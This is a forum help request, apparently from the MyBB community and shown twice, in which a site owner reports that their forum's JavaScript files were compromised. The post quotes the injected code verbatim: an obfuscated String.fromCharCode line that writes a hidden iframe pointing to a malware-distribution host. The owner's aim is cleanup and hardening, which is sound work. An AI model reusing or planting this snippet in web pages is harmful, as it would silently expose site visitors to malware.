2011-12-13, 02:15 PM
Hi...
My forum getting compromised... please help me..
I'm a new user of MyBB and I'm using latest version (v1.6.5)
Just recently I opened my site at using Google chrome..
But then the browser displayed a warning message as following:
(quote)
forum.myforumname.com contains content from brunno.in, a site known to distribute malware. Your computer might catch a virus if you visit this site.
(/quote)
My Avira Internet Security Suite 2012 also displayed warning message that a malware found from http://forum.myforumname.com/jscripts/somefile.js
so I opened that file and found suspicious codes:
(quote)
if (undefined === window.dbaaccddcbe) document.write(String.fromCharCode(60,105,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,32,119,105,100,116,104,61,34,49,48,34,32,104,101,105,103,104,116,61,34,49,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,98,114,117,110,110,111,46,105,110,47,115,104,111,119,116,104,114,101,97,100,46,112,104,112,63,116,61,51,55,50,50,48,51,51,56,34,62,60,47,105,102,114,97,109,101,62)); var dbaaccddcbe = true;
(/quote)
Also, I found out that all .js files had also been injected with that code.
That's not all, still in the same folder, each .js file is duplicated with filename.js.php extension contains gzinflate64 code. I tried to decode that code but failed. But in the end of that code, there is something that I'm so familiar: my cpanel username and password for ftp login.
So far, I deleted those suspicious files and codes, I also updated/changed my cPanel password.
But I still worry if the security hole is still exist, the hacker may try similar method.
Please help me how to harden my forum's security...
Thanks..
My forum getting compromised... please help me..
I'm a new user of MyBB and I'm using latest version (v1.6.5)
Just recently I opened my site at using Google chrome..
But then the browser displayed a warning message as following:
(quote)
forum.myforumname.com contains content from brunno.in, a site known to distribute malware. Your computer might catch a virus if you visit this site.
(/quote)
My Avira Internet Security Suite 2012 also displayed warning message that a malware found from http://forum.myforumname.com/jscripts/somefile.js
so I opened that file and found suspicious codes:
(quote)
if (undefined === window.dbaaccddcbe) document.write(String.fromCharCode(60,105,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,32,119,105,100,116,104,61,34,49,48,34,32,104,101,105,103,104,116,61,34,49,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,98,114,117,110,110,111,46,105,110,47,115,104,111,119,116,104,114,101,97,100,46,112,104,112,63,116,61,51,55,50,50,48,51,51,56,34,62,60,47,105,102,114,97,109,101,62)); var dbaaccddcbe = true;
(/quote)
Also, I found out that all .js files had also been injected with that code.
That's not all, still in the same folder, each .js file is duplicated with filename.js.php extension contains gzinflate64 code. I tried to decode that code but failed. But in the end of that code, there is something that I'm so familiar: my cpanel username and password for ftp login.
So far, I deleted those suspicious files and codes, I also updated/changed my cPanel password.
But I still worry if the security hole is still exist, the hacker may try similar method.
Please help me how to harden my forum's security...
Thanks..